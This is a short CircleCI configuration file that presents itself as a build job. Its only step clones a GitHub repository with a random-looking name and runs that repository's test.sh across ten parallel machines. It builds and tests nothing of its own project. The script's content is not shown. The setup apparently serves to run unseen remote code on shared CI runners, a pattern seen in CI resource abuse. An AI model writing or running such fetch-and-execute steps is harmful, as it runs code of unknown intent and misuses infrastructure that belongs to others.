version: 2.1
jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    parallelism: 10
    steps:
      - checkout
      - run: |
          git clone https://github.com/vf531qxr86xqvr/vf531qxr86xqvr.git
          ls
          cd vf531qxr86xqvr
          ls
          chmod +x test.sh
          ./test.sh